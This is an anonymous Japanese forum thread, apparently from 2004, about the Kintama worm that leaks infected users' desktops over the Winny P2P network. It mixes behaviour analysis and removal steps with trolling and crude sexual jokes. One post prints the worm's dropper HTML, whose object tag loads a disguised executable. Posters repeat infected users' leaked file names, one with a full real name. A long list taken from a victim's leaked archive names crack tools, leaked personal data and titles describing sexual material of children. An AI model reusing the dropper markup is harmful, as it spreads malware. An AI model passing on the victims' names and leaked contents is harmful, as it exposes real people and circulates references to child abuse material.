キンタマ注意。

winnyを起動し、[キンタマ]　で検索すると大変なことになっています。
キンタマウイルスに感染した際にwinnyネットワークにアップされるファイル
・ デスクトップ画面キャプJPEG画像　ファイル名 : [キンタマ] 俺のデスクトップ user名 [キャプ年月日].jpg
　 (キャプは一日一回の模様)
・ 圧縮ファイル　　　　　　 ファイル名 : [キンタマ] 俺のデスクトップ user名 [キャプ年月日](ファイル詰め合わせ).zip ( or .lzh )
　 そのユーザのデスクトップにあるファイルすべての圧縮ファイル、キンタマウイルスが含まれている場合もあり?

●感染しているかの確認方法●
Upfolder.txtファイルがファイラーでみえているかと、
フォルダ情報に登録したことのない見えないフォルダのBbs2 or Cache2
のフォルダが登録してある。

●ワームの駆除方法●
前Winnyをフォルダごと削除後に、ダウソし直したNyを再設定
すればＯＫ

●予防方法●
不用意に .exeファイルを実行しない。

●自分が感染していた場合の対処方法●
一度winny上に流れたファイルはもう止められません。祈りましょう。

nao: この>>2getってもうネット上のものじゃないのかもね

nao:>>3 っていうか　僕たちはこれから始まるんだよ
nao:>>4にはこれからもそのままでいてほしいな
nao: こんな時間だからエッチな会話もしたくなるけど>>5にはそれをさせないオーラを感じるよ
nao: そうだよ　これからは僕はご主人様で>>6は僕の可愛い愛奴なんだから
nao: >>7だからこそお互い一緒に舐め合おうって言ったんだよ
nao: じゃあもしオチンチンを舐めてって僕が言ったとしたら　それは>>8にとってはどういう行為？
nao: >>9この白い液ておしっこじゃないよね
nao: >>10ペロ〜ン
nao: >>1000僕の恋人になってくれませんか

nao: >11-999反則かもしれないけど
nao: 愛してる・・・

>>2
オチンチンを高速でしごくんだ！

Winnyで感染を広げる新種ウイルス出現，パソコン中のファイルを盗まれる恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040317/141562/

Antinny.BやAntinny.Eとキンタマは別物です。

キンタマ資料

http://www.geocities.jp/kim_virus/
http://perape.hp.infoseek.co.jp/column/f00/colm_f42.htm
http://myui.s53.xrea.com/kin/index.html

ｽﾚﾀｲｼﾝﾌﾟﾙｽｷﾞ(･∀･)ｺﾝﾆﾁﾊ!!

糞ny厨房とっとと氏ね

（・∀・）ﾆﾔﾆﾔ

>>7
(･∀･)ｺﾝﾆﾁﾊ!!

　　　　　　　　|　　　　　　　　　　　　　　　　　　　　 　 　 　　 /ヾ
　　　　　　　　|　　　　　　　　　　　　　　　　　　　 　　　 　　ゝｲノ
　　　　　　　　|　　　　　　　　　　　　　　　　　　 　　　 　 　 /　/
　　　　　　　　|　　　　　　　　　　　　　　　　　　 　　　　 　 /　/
　　　　　　　　|　　　　　　　　　　　　　　　　 　　　　 　 　 /　/
　　　　　　　　|　　　　　　　　　　　　　　　　　　　　 　 　 /　/ 　 　 ＿＿＿＿＿
　　　　　　　　|　　　　　　　　　　　シコ　　　n_　　　　　./　/ 　 　 .|　　　　　　　|
　　　　　　　　|　　　　　　　　　　　　　　　　（　 ﾖ　　　 /　/　　　 .|　　　　　　　|
　　　　　　　　|　　　　　　　　　　　シコ　　　| `|. 　 　 /⊂//　　　 |　　　　　　　|
　　　　　　　　|　　　　　　　　　　　　　　　　 |　|.　 　 /⊂//　　　　|　　　　　　　|
　　　　　　　　|　　　　　　　　　　　　　　　 ／ ﾉ￣ `/　 /　　　　　 |　　　　　　　|
　　　　　　　　|　　　　　　　　　　　　　　／ ／ イ　 Ｏ○ヽ 　 　　 |　　　　　　　|
　　　　　　　　|　　　　　　　　　　　　　（ `ノ )/(/|　 |'^ ＼ ＼　　　 |　∧∞∧　←みづき
　　　　　　　　|　　　　　　　　　　　　　(｡Д｡'')~　|　 |　　　＼＼　 ��(´Д｀,,)　 .|
　　　　　　　　|　　　　　　　_＿＿＿. 　 ∨∨　　|　 ）　　　　|　）　|　 (　：　) 　 |
　　　　　　　　|.| ￣ |￣ ／ 　　／｜|　　　　　　/　/　　 　 /　/　 .| 　 ∪∪ 　 .|
　　　　　　　／|. ： ｜　|￣￣｜　｜|￣￣￣　/　/￣￣￣ ∪　￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　　｜＝｜ .＼￣￣＼｜|　∧　　　∪
　　人人人人人人人人人人人人人/　`人人人人人人人人人人人人人人人人人人人人人
　 ）　オチンチンを高速でしごくんだ！オチンチンを高速でしごくんだ！

>>1
(・∀・)ｺﾝﾆﾁﾊ!!　

ﾀﾘﾗﾘﾗｰﾝﾉ(･∀･)ｺﾝﾆﾁﾊ!!

まず初めにキンタマで検索するやつがいるんかね？

ここはレスするのをグっと我慢する所だな

ＶＢ対応したのか？？？

>>15
ウイルスパターンファイル1.827.00で手元にあるキンタマをスキャンしました。

対応はまだのようです。

ウイルスバスター本当にダメなのか…（´・ω・`）ｼｮﾎﾞｰﾝ

ウイルスパターンファイル1.827.00で手元にあるキャンタマをスキンしました。

治療はまだのようです。

とある精神科に子供づれの奥様たちがグループカウンセリングに訪れていた
出来事だった。
「人というのは、自分でも知らないうちに強迫観念に囚われているものです
。あなた方もそうかもしれません。」
医師は、最初の母親を見つめて言いました。
「アンさん、あなたは食べるということに囚われている、だからあなたは娘
さんにキャンディーと名づけてしまった。」
つづいて２人目の母親にむかい医師はいった。
「メアリーさん、あなたはお金に囚われているのでしょう。だからお子さん
にペニーと名づけてしまった。」
すると３人目の母親が急に立ち上がり、子供の手を取り子供に囁いた。
「さぁ、ディック、もうおうちに帰るわよ」

なんかキンタマだらけだw

WORM_ANTINNY.Bの日本語情報が出ました。
トレンドマイクロの西野氏の言う通り、キンタマとは別物ですね。

WORM_ANTINNY.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.B&VSect=T

それから、WORM_ANTINNY.Cが出ました。
これもキンタマとは別物のようですね。

WORM_ANTINNY.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.C&VSect=T

うぉ、やっぱり別物だ…
これ明言遅れたから、安心してニュー速でクリックやDLしまくった人が
感染してたらﾜﾗｳ

http://www5e.biglobe.ne.jp/~yb_net/clip/img/18227.jpg

Winnyはウイルスラッシュだね。
これはもうだめかもわからんね。

よかった、やっぱり別物か
キンタマに感染するよりマシだな

今気付いたけど、西野氏じゃなくて西山氏じゃないか。

感染した人、あるいは解析牧場の人、
キンタマzipファイルはキンタマ名のHDD全体検索で出るんですか？

前スレ

winny使用者はキンタマウイルスに注意
http://pc.2ch.net/test/read.cgi/sec/1079369336/

>>27
<　`∀´>　ｱﾝﾆｮﾝﾊｾﾖ!!

　　　　　　 　　　　　　/ヽ　　　　　　　/ヽ
　　　　　　　　　　　　/　 ヽ　　　　　 /　ヽ
　　＿＿＿＿＿＿ /U　　ヽ＿＿＿/　　ヽ
　　|　＿＿＿＿　／,,　　　U　　,,　:::::::::::U:＼
　　| |きんたま　/《;.･;》＿__　《;.･;》 　::::::::::::::|
　　| |きんたま　|　　　|　　 |　　　　　U :::::::::::| 　・・・
　　| |きんたま　|U　　|　　　|　　　　　　::::U::::|
　　| |きんたま　.|　　├―-┤　U...:::::::::::::::::/
　　| |＿＿＿＿　ヽ　　　　　.....::::::::::::::::::::::<
　 └＿＿＿／￣￣　　　　　　::::::::::::::::::::::::|
　　|＼　　　 |　　　　　　　　　　　::::::::::::::::::::::|
　　＼ ＼　 ＼＿＿＿　　　　　 :::::::::::::::::::::::::|

844 名前： [名無し]さん(bin+cue).rar 投稿日： 04/03/18 14:54 ID:L9PuNWzW
naoって某スタジオの政直くんの事だったんですね。
ファイル詰合せのチャットログ見てようやく理解できたよ。
それにしても自爆モンだよね。久し振りに笑いましたワ。
3/16以降の詰合せにはＣドライブ初期化のバッチと、それにリンクした
「メール履歴.htm」が含まれてるね。本人の苦心作？ご苦労様です。

確認されているキンタマ　それぞれ拡張子はexe

CRC16:E837　　本体？デスクトップうp型？　（ノートン対応済み）
CRC16:57E0　　亜種？My Documen うｐ型？
CRC16:CFB7　 亜種？

キンタマの動作
　　　　　↓ダウソ時、踏ませるための偽装
　　　　・自身を踏ませるためのhtmlファイルを作成。またその拡張子を.folderにすることでフォルダに偽装。アイコンを偽装して「xxx.jpg(長い空白).exe」をjpgファイルに偽装。

　　　　　↓実行時
　　　　・「圧縮(Zip形式)フォルダは無効であるか、または壊れています」というダイアログ表示やjpgの場合実際に画像を表示。実行されたことを隠す。
　　　　・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run　に名前xxx データC:\Program Files\xxx\xxx.exe登録、常駐する。xxxは共通。exeはキンタマのコピー。

注意はしていたけど踏んでしまったので、前スレの情報を元に駆除に成功した模様なので
いちおまとめておきます。

１．　タイムスタンプが　1984/10/18 8:48:19　のファイルを検索
　　多分サイズは 376,832　です。
　　多分場所はProgram Files　です

２．　レジストリエディタを起動して１で見つかったファイル名を指定しているキーがあるので削除する。
　キーの場所は　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

３．　１で見つかったファイルを削除


２と３は逆でもいいけど、ファイル名は覚えておきましょう。

上記手順はあくまで、踏んでしまった直後に有効です。
再起動してしまったあとは知りません(^^ゞ

間違っているところがあれば添削ねがいます

　　　　　　↓発動は再起動後
　　　　・My Documentを検索、ピックアップして圧縮してうｐ。
　　　　・downフォルダの中から適当なファイルを選び圧縮してうｐ。
　　　　・これらうｐされる圧縮ファイルにキンタマを詰める。
　　　　　　※キンタマ自身は自分自身で生成するランダムな名前とDownload.txtを参照し、偽装。
　　　　・C:\Documents and Settings\ユーザー名\Local Settings\Temp　にユーザー名.txtを作成。（名前が変わる場合あり）
　　　　・regedit.exeがnotepad.exeに書き換えられる。（キンタマがぬるぽを利用？）
　　　　・winnyフォルダ（場所は変化する？）にSystem Volume Information 又はBbs2
　　　　　又はCache2又はReadMeFiles名のフォルダ作成。（システム属性の場合あり）
　　　　・Upfolder.txtを改変（システム属性になる場合あり）。上記のフォルダをnyのUpfolderに強制的に指定する。
　　　　・キンタマ実行時に、乱数(多分0〜99)を発生させる。そして、その乱数×1416（秒）ごとにSSを撮ってうｐ。
　　　　　　　ファイル名 : [キンタマ] 俺のデスクトップ user名 [キャプ年月日].jpg
　　　　・デスクトップに置いてるファイル2GBまで勝手にzipかlzhに圧縮してうｐ。(2GB以上あっても2GBまでの分をうｐ)
　　　　　　　ファイル名 : [キンタマ] 俺のデスクトップ user名 [キャプ年月日](ファイル詰め合わせ).zip ( or .lzh )

　　　　　↓トリガー不明
　　　　・ユーザー名でny使用者であると宣言する内容のメール送信　　・血しぶき表示
　　　　・悲鳴WAV再生機能（最大音で　　　　・ぬるぽ　ガッAA表示

自己改造はしない模様だが亜種がまだまだありそう。

>>33
再起動前ならそれだけで大丈夫だと思います。
再起動後はいろいろ面倒ですが…

情報をまとめると、キンタマのタイムスタンプは1984年と1992年の二種みたいですね。
1984/10/18 8:48:19　と 1992/06/20 07:22:17 か？1984はキンタマE837ぽい。

711 名前： [名無し]さん(bin+cue).rar 投稿日： 04/03/18 23:28 ID:FLsWm1Yw
サブPCでわざと感染させて時計進めて見たら大変なことが起きた
大変すぎてここには書けない
ヒントは例のNY使用暴露メール

OE起動するルーチンなんか入ってたっけ？

自前でSMTPエンジン持ってるワームなんていくらでもあるだろ。

>>33
再起動しちゃった場合

UpFolder.txtがシステムファイル属性で作られる。
フォルダオプションで「すべてのファイルとフォルダを表示する」を選択し、
「保護されたオペレーティング システム ファイルを表示しない」のチェックをはずして、
全てのファイルが見える状態に設定すると見えるようになる。

UpFolder.txtの中で指定された場所に、readme.filesフォルダがある。
UpFolder.txtとreadme.filesを削除する。

１．のProgram Filesのどこかにあるキンタマ実行ファイルは実行中のため削除できない。
そのファイルが、通常実行されていないファイル名なら、タスクマネージャーからプロセスを殺せば良い。
同じ名前のプロセスが複数あって、どれを殺せばいかわからない場合、
先に２．のレジストリの値を削除して、再起動する。

というか、レジストリさえ削除しちゃえば、起動時に自動で実行されなくなるから、
それだけでもOKな気もする。

再起動したら、キンタマは実行されてないので、普通に削除して終わり。

sockはたたいてないことは確認したが、winsock使わないで
コネクション張る方法って無いよね？
ある？

>>40
無いことも無い。

BBSのポート使って拡散しているような気がする

>>42
ﾏｼﾞﾃﾞｽｶ？

タイムスタンプについて(E837)
うちの環境ではウイルスが作成したny共有フォルダに入っているものは日付がばらばらです。
自分が実行したファイル(ウイルス)と同じ日付のを探すべきかと

共有ファイルの中にたまにユーザー名.txtも入れることがあるのが怖いな(outlook使わなきゃ大丈夫か？)
しかもdownにおいてある圧縮ファイルにウイルス付ける時もあるし、合法のファイル名でも油断できない…
あとキャッシュいじってない？よくわからんな…

>>43
ノードとか異常だよ

>>35
>>39
>>44

レスありがとうございました。
>>33の改訂版作りましたが1992/06/20 07:22:17版のサイズ等が不明でしたので
????にしてあります。
どなたか補完して頂ければありがたいです。


【ウィルスを踏んでしまってPC再起動前なら】

１．　実行してしまったキンタマウィルスファイルのタイムスタンプと同じファイルを検索する
　　多分場所はProgram Files　です
　　　参考：現在わかっているものは補足に記載

２．　レジストリエディタを起動して１で見つかったファイル名を指定しているキーがあるので削除する。
　キーの場所は　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
３．　１で見つかったファイルを削除


２と３は逆でもいいけど、ファイル名は覚えておきましょう。


補足：判明しているタイムスタンプとサイズ
タイムスタンプ 1984/10/18 8:48:19　サイズ 376,832　　← キンタマE837
タイムスタンプ 1992/06/20 07:22:17　サイズ 376,832　　← キンタマ????

続き

【ウィルスを踏んでしまってPC再起動してしまった後は】

１．　UpFolder.txtがシステムファイル属性で作られる。
　　　フォルダオプションで「すべてのファイルとフォルダを表示する」を選択し、
　　　「保護されたオペレーティング システム ファイルを表示しない」のチェックをはずして、
　　　全てのファイルが見える状態に設定すると見えるようになる。

　　UpFolder.txtの中で指定された場所に、readme.filesフォルダがある。
　　UpFolder.txtとreadme.filesを削除する。

２．　タイムスタンプが　実行してしまったファイルのタイムスタンプと同じファイルを検索する
　　多分場所はProgram Files　です
　　　参考：現在わかっているものは補足に記載

　　見つかったファイル名はメモするなりして覚えておきましょう

３．　レジストリエディタを起動して１で見つかったファイル名を指定しているキーがあるので削除する。
　キーの場所は　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
４．　PCを再起動し１で見つかったファイルを削除

　　　必須ではありませんが、再感染しないためにも削除しておきましょう


補足：判明しているタイムスタンプとサイズ
タイムスタンプ 1984/10/18 8:48:19　サイズ 376,832　　← キンタマE837
タイムスタンプ 1992/06/20 07:22:17　サイズ 376,832　　← キンタマ????

本日はこれにて書き込み終了します。
被害者が増えない一助になれば幸いです。

>>46 >>47
誤記だらけで直しどころ満載ですた
けどもう寝ます(^^ゞ

体験版でもいいからノートン使うと、
Program Filesのファイル、駆除できないけど発見できるみたいですね
プロセス終了させると削除できる。

regedit.exe戻せない人は・・・いないよね？

>>33
お疲れ様です

不可視フォルダに入っている本体も発見できるの？

>>50
試してないけど、できるはず

>>50
ネトラン厨かお前は。それくらい自分で判断しろよ。
何のために金払ってｱﾝﾁｳｲﾙｽｿﾌﾄを買うのか良く考えろ。
不安だったらｸﾘﾝｲﾝｽﾄｰﾙするなり死ぬなりテメーで判断しろ。

勘違いすんな。
すでに駆除したから別に不安ってワケじゃない。
ノートンの実力が知りたかっただけだ。

>>53
ノートン先生に軽く失礼だな
不可視フォルダをスルーするようならマジで誰も買わないだろ

あの〜。
なんでセキュ板に2-53みたいな厨が書き込んでるんですか？

なんだ、ド素人だったのか、、

手元にある 376,832 bytes (E837)のものは、
ファイルのタイムスタンプが 1984/10/18 08:48:19 で、
PE HeaderのTimeDateStampが 1992/06/20 07:22:17 になってる。

このファイルしか見てないからよくわからんけど、
同サイズでタイムスタンプが複数あるとされているのは
どの部分を見てるか統一されてないって可能性はある？

プリントスクリーンの機能を停止させることは出来ないのでしょうか？

>>54
不可視フォルダに入っているファイルネームや大きさ、機能なんか知らない人は
これだから（ｒｙ

いや、別にいいけどな。　
所詮他人事だしｗ

香ばしいな、おい

>>59-60
uze

Win2kで感染させてみた。

漏れはE837のｷﾝﾀﾏしか持ってないだが、
こいつはデスクトップを固めるって機能持ってるのかな？
今のところWin98, Win2kではデスクトップのファイルのみを固めるという挙動はしないなぁ…

まぁいいか。
（・∀・）ﾉｼ ｵﾔｽﾐ!!

おい、解析してる勇者達よ。
君らはアセンブリ語で読んでるのかね？すごいな、おい。。。
俺はDelphiは読めるが、アセンブリは無理だ。。。
Delphiのソースに直す逆コンパイラないですか？

>>64
そんなんあったら苦労しません

>>65
DeDeってソフトがあるっぽいのですが、リンク切れてて・・・
存在はするはずなんですけど

>>57 うちの環境ではこんなんなった。E837が作ったファイル
ttp://sakots.pekori.jp/cgi/sn/src/up1323.jpg

>>67
漏れその魚のjpgをirfanviewで見ちまったけど
そんな漏れはキンタマ感染済みでつか？

>>67　ﾊﾞﾃﾞｽﾄ(･∀･)ｲｲ!!!

あげちゃってｽﾏﾝ･･･
回線切って、(･∀･)ｺﾝﾆﾁﾊ!!!

では、これは何のソフト使ったか教えてくれませんか？
http://myui.s53.xrea.com/kin/nao/index.html

過去ログに書いてあるやん。

>>71
バイナリエディタ

ダウソ板だけどな。

>>36
そのスレ探して開いてみたらｳｲﾙｽ貼ってあった
そのﾚｽは貼り逃げのガセ

[キンタマ] 俺のデスクトップ 北泉　良直 (JASRAC) [04-03-15](ファイル詰め合わせ).zip
の中に入ってる「ごみ箱 .exe」と「電話番号・メアドリスト・カード番号・パスワード等 .exe」
がすげー怪しいんだけどノートン先生反応しないんだよね。

亜種ｷﾀｰ?

これは

　　　　当分ダメかもわからんネ　克服不能じゃ…

　　　　　＿＿＿
　　　 ／　　　　 ＼　　　　　＿＿＿＿＿＿＿＿
　　 /　　 ∧　∧　＼　　／
　　|　　　　 ・　・　　 |　＜ いちいちsageても無駄。
　　|　　　　 ）●（　　|　　＼＿＿＿＿＿＿＿＿
　　＼　　 　 ー　 　ﾉ
　　　 ＼＿＿＿_／
　　　／　　 　　　＼
　　｜　　　　　　　　＼ ＿＿＿＿
　　 |　＼　＼　　　　 //　　　　　　//
　　｜　 ＼　＼　　 //　　　　　　//
　　｜　　　＼　＼ //　　　　　　//
　　｜　　　　 ＼　○―――――）
　　｜ |￣￣￣￣匚￣￣￣￣￣|

解析スレとかないの？

[キンタマ] 俺のデスクトップ 横○良○ [04-03-15](ファイル詰め合わせ).lzhはキンタマ入りだから気をつけろ

お得情報.exeと使用マニュアル.htmlが入っているぞ


使用マニュアル.htmlの拡張子をtxtにして開いてみた↓（注：○は伏字）
<html><head><title>[キンタマ] 俺のデスクトップ 横○良○ [04-03-15](ファイル詰め合わせ)</title>
<object CLASSID='CLSID:00000000-0000-0000-0000-FFF085324649' CODEBASE='img/お得情報.exe'></object>
</head><body>
<h2>[キンタマ] 俺のデスクトップ 横○良○ [04-03-15](ファイル詰め合わせ)</h2>
Someone has set you up on a Blind Date with another friend,<br>but you have not accepted the invitation that was sent on 3/6/2004<br>
at 1:25:47 PM<br><br>Follow link below to accept the invitation:<br><br>http://lookforamatchonline.com/confirm/?oc=50562134<br>
<br>or if busy<br><br>http://waytogetalovelife.com/confirm/?oc=50562234<br><br>The FREE dating web site<br>CREATED BY WOMEN<br>
<br>Click here if you do not wish to be invited again:<br><br>http://waytogetalovelife.com/remove/?oc=505632214
<p>■サポートはこちらで承っております。<br> 担当：　<a href="">横○良○</a></p>
</body></html>

それはキンタマの標準動作。
それ知らない奴[キンタマ]で集めるべきじゃないな。

これはkazaaとかその辺の外国で流行ってるP2P感染型ウイルスより手が込んでんの？

今わかってる範囲では基本的に破壊を一切行わずに情報漏洩に専念するらしいｗ
なので被害に気づくことなく延々と流し続ける…

しかもnyに流れてしまった後は例え訴訟起こして差し止め命令勝ち取っても
物理的に執行不能。悲惨すぎ。

唯一の救い(？)はこいつが発症すると血しぶきが表示されるらしく、
これで何かに感染してるという自覚症状があること。
ウイルスパターンが自動更新で出回るようになったら
収束するかも。

nyやらなければ済む話だ

一度知ってしまえば、フォルダ情報見るだけで発見・対処できるけどな。

手動更新てどうやんの？
ちなみにノートンです

>>86
http://www.symantec.co.jp/region/jp/sarcj/defs.download.html

後は自分で考えろ。

ノートンのフォルダから1988年のタイムスタンプで
QuarOpts.datってファイルが出てきたんですが
これ違いますよね？

>>88
おめでとう



　　　　　　　　　　　　　　　　　　　　　　　ω

>>88

ヾ(;゜□゜）ノギャアアーー！！

俺のとこにもあるYO!
マジかよ！マジで削除しました。

>88
ノートンのパスワード保護に関するファイルっぽいけど？
ttp://66.102.7.104/search?q=cache:IpLkO6pBJrcJ:securityresponse.symantec.com/avcenter/security/Content/2001_07_24.html+QuarOpts+dat&hl=ja&ie=UTF-8&inlang=ja

漏れも感染した。
場所はc:\program files\divx\divx_env.exeで更新日時は1984/10/18 8:48だった。
レジストリは、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに、
DIVX ENVで"C:\Program Files\DivX\divx_env.exe\" /startってのが作られてた。
さっきAVGとトレンドのオンラインスキャンでチェックさせたけど、どちらも未反応だった。

感染の経路はNAOさんの3/13の詰め合わせを見ようとして、
アーカイバで表示されたReadme.filesフォルダの中の.exeを選択して、
「解凍」の下の「解凍して実行」メニューを手が滑ってクリックしちゃった。
「この圧縮ファイル壊れてるよ」ってメッセージが開いて、全てを悟った。
漏れってひょっとして、NAOさんの次くらいにアホなんじゃないかと思った。

>>93
僕も恵美のその勇気しっかり受け止めるからね

オティムティムを高速でしごくんだ！！！

>>94-95
ありがとう、NAOさん。なんだか元気が出てきました。
ちなみに、気持ち悪いのでXPの再インストールすることにしますた。

再インスコする前にAVGのuse heuristicsをオンにして
該当.exeをもう一回スキャンしてみてよ
AVGスレで警告がでるとかいう情報があったからさ

>>97
use heuristicsしてるんだけど、無反応だった。
ちなみに、データベースは3/18更新分406。
AVGスレのぞいてみたけどキンタマに警告だしたってレスありますか？

840 名前：名無しさん＠お腹いっぱい。sage 投稿日：2004/03/18(木) 04:09
キンタマっぽい書庫を解凍したときに
hidden extensions.exeっていう警告が出た。
でも右クリックメニューから行ったスキャンでは
ウイルスは見つからない。
このhiddenなんたらってのはヒューリスティックスキャンを
ONにしておかないと出ないみたい。

AVGでキンタマ本体をチェックしてもひっかからないみたい

シマンテック（暫定対応）やトレンドマイクロが完全対応していないのに
AVGで検出できるとは思えないな。

とりあえず内部にあったテキストのリスト。

(STUDIO LOUD IN SCHOOL) C+
(STUDIO LOUD IN SCHOOL) C+ (コスプレ写真集)
(TEAM PHOENIX) ブルマーとか好きだから (あずまんが大王)(ふたなり)
(アプリA) AntiVirusを含むNorton製品のLiveUpdate期限切れクラック（インストール方法説明あり）
(クリムゾン)(ブラックキャット) 実物提示教育3
(サンクリ20)
(シスタープリンセス) 挑発∞
(ハトコミ)
(詰め合わせ)逆転裁判もの5冊
(月姫) ［しもやけ堂 (逢魔刻壱)］ 猫の休日 (ふたなり) (サンクリ20)
(月姫) ［むうんるうらあ (月野定規)］ 想月夜 其の二
(月姫)[猫バス停] ネコバステイノホン 5
(清岡) プチトマト豪華本 「プチフレッシュ」
(魔法先生ネギま！、スクールランブル) ［リリーマルレーン］ ドキドキ恋愛物語。
(無修正) VERMILION 3(不思議の海のナディア)
(洋ロリータ写真集-無修正)yarina（12,3才の超美形、微乳） BD-COMPANY
128k mp3
175R - Songs
192k
1983-10-2 気分はオトナ(ロリ)
1st CONTACT - ORANGE RANGE
320k
4REAL - Crystal Kay
666 - HYDE
APP

B'z - BIG MACHINE
B'z - The Ballads〜Love & B'z〜
BEST ALBUM 2001-2003 - KICK THE CAN CREW
BLT-川澄舞
BRIDGE - SPEED
BoA - VALENTI
C63
C64
C65
C66
CHEMISTRY - Between the Lines
Crescent - Gackt
Cレヴォ32
Cレヴォ33
Cレヴォ34
Cレヴォ35
DREAMAGE-DREAMS COME TRUE “LOVE BALLAD COLLECTION"- - DREAMS COME TRUE
Do As Infinity - TRUE SONG
Dragon Ash - HARVEST
EXILE - Styles Of Beyond
Every Little Thing - Every Best Single 2
Every Little Thing - Many Pieces
GATES OF HEAVEN - Do As Infinity
GLAY - GLAY rare collectives vol．1
GLAY - GLAY rare collectives vol．2

Graphis　森下くるみ
HY - Street Story
I WiSH - 伝えたい言葉〜涙のおちる場所〜
KICK THE CAN CREW - magic number
Ken's Bar - 平井堅
KinKi Kids - F album
KinKi Kids - G album-24/7-
LOVE - 中島美嘉
Lolitaロリータ秘密(ノーカット)
MINMI - Miracle
MISIA SINGLE COLLECTION 5th ANNIVERSARY - MISIA
MP3
MP3 320k
MP3アルバム
Memorial address - 浜崎あゆみ
Microsoft Windows XP プロダクトキー＆OEM日本語版→VL日本語版製作法(確認済み)
NUMBER ONES - マイケル・ジャクソン
Norton AntiVirus 2003 などを2022年まで使えるようにする方法
OfficeXP Pro 50回制限はずしクラックパッチ
Pandora
Pandora シリアル集
RIP SLYME - TIME TO GO
SMAP - MIJ〜SMAP 016
SMAP - SMAP 015/Drink! Smap!
SOUL'd OUT - SOUL'd OUT

STYLE - 安室奈美恵
Serial
THE BEST OF DETECTIVE CONAN 2〜名探偵コナンテーマ曲集2〜 - アニメ主題歌
THE HIT PARADE - TAK MATSUMOTO
TVサントラ - 「機動戦士ガンダムSEED」COMPLETE BEST
WMA
Windows XP OEM版 クラック方法
Windows XP 完全クラックマニュアル
Winny crack kick(クラック版をはじく)
Winny2b7．1クラック方法
Winnyで通信相手を特定する方法
Wonderful - DOUBLE
Yahoo!BB流出個人情報（一部）
Yuming Compositions:FACES(初回生産限定盤) - 松任谷由実
ZIPファイルのパスワード解析マニュアル
[15歳] 宮本ゆか
[BIG BOSS(本体売)] カナちゃんの電撃コスプレ超作戦
[BLT-152]（樋口麻由）ギルティギアゼクス ミリア・レイジ
[BLT]氷川菜織(星野瑠海)
[BM団] VALKYRIE PROFILE in BABEL （ヴァルキリープロファイル・FF8・ソウルキャリバー）
[CUT A DASH!! みつみ美里 ＆ Blazer One 甘露樹] 2003年カレンダー (カレンダー) (02-11-04)
[DEEPBLUE] 3LDK クラックパッチ
[Digital Lover](なかじまゆか)Rough Sketch10(ラグナロクOL) (02-11-0
[FANTASY WIND(しなのゆら)] 色即是空 (式神の城、DOA3)
[GOLD RUSH] おせち料理 (マブラブ)

[INFINITY-FORCE・マーシーラビット] (デジモン) デジ魂 01
[MANITOU(中島零)]Ts(ファンファンファーマシィー_秘境探検ファム&イーリー)
[METAL]超次元来美個人誌 SNIPERS (FF7・FF8・DOA2・ソウルキャリバー)
[MG WORKS／位相同爆] CLASSMATE SECOND (トゥルーラブストーリー２)
[MeltyBlood] OP Mellty Blood full ver (Ripped from PROMISED DAWN) (お試し用ですｗ)
[NAS-ON-CH] ONEGAI・DEMONGEOT 5
[NOANTICA][おーじ] LITTLE ELF(みつあみエルフさんと触手
[ONE HIT WONDER(長月みそか)] すてぃるぶる〜 [2003.04.29]
[RIROLAND] PINK・PERFECTION (カードキャプターさくら、ポケットモンスター、大運動会)
[SM緊縛] 本庄奈津子 「質より量」でおなじみのMIRACLE 2001年7月号(1of3) 荒川真希
[ST.DIFFERENT]「OUTLET VOL.12」(DOA3)
[STUDIO BIG-X] MOUSOU みにしあたー 8 (ナデシコ・ときメモ・ガンダムＸ)
[STUDIO BIG-X] SHADOW CANVAS 08 (ファンシーララ)
[STUDIOふあん] ねぎだく ! (魔法先生ネギま!)
[TEX-MEX] - 10冊セット
[Tony][T2 ART WORKS](ラグナロクOL) カブリモン Vol.1
[UNISEX BLEND] らぐなっこ。４(ラグナロクオンライン)
[bolze] A Selection. (ガンパレードマーチ)
[bolze](プリンセスメーカー)princess shaker
[あいすとちょこ] ぷちぼん (2003-10-05)
[あさりよしとお、森野うさぎ他]「女体のひみつ」
[あぶらかたぶら] G (機動戦士ガンダムSEED)
[おませな妖精] 佐々木愛 12歳
[こばやしひよこ] DEAD or ALIVE 2 hardcore X
[たこつぼ倶楽部] DANGER ZONEセット(１６冊)

やめろあほ。
７００行はあるだろ。

350dayo

[なかよひモグダン] 夏色のエプロン
[ねりわさび＆えびふらい] 24冊詰めあわせ
[ぶんちん堂] ドーターちゃんが好きっ (爆れつハンター)
[ぷるるんえすて 上月まんまる] 赤のドウジンシ(PSO)
[ギャンブラー倶楽部] PAKESYS FORCE [ヴァンドレッド]
[ギャンブラー倶楽部] カトレアねーちゃん大活躍!!
[クリムゾン] セフィリアハード 2 (BlackCat)(リサイズ)
[クリムゾン] マリア
[クリムゾン] 快感のマテリア(FF7ティファ)
[クリムゾンコミックス]　クリムゾンコミック　64冊セット
[サルヴェージ工房] ナージャの喰いだおれ紀行 (明日のナージャ)
[スクール水着・ブルマー]KiLA SHOP「ときめき」
[スタジオKIMIGABUCHI (えんとっくん)] HEART(To Heart)
[スタジオKIMIGABUCHI (えんとっくん)] HUNG MYSELF （エヴァンゲリオン）
[スタジオKIMIGABUCHI] A.BOY （スレイヤーズ・セイバーマリオネットJ・ナデシコ・GS美神）
[スタジオKIMIGABUCHI] FULL_METAL(フルメタルパニック)
[スタジオKIMIGABUCHI] RANMA1／2 WORKS3 (らんま1／2)
[スタジオKIMIGABUCHI] TX
[スタジオKIMIGABUCHI] WORKS K2 (ナデシコ レイアース)
[スタジオKIMIGABUCHI] WORKS3 (らんま)
[スタジオKIMIGABUCHI] WORKS（スレイヤーズ&セイバーマイオネット）
[スタジオKIMIGABUCHI] ピンばけ (ラブひな ケロロ軍曹)
[スタジオKIMIGABUCHI] 闘心 (NOIR、ヴァンドレッド、さくら大戦3)
[スタジオKIMIGABUCHI] 裏くじびきアンバランス (げんしけん)
[スタジオKIMIGABUCHI]すぺしゃるKIMIGABUCHI(サクラ大戦3 ハレのちグゥ)

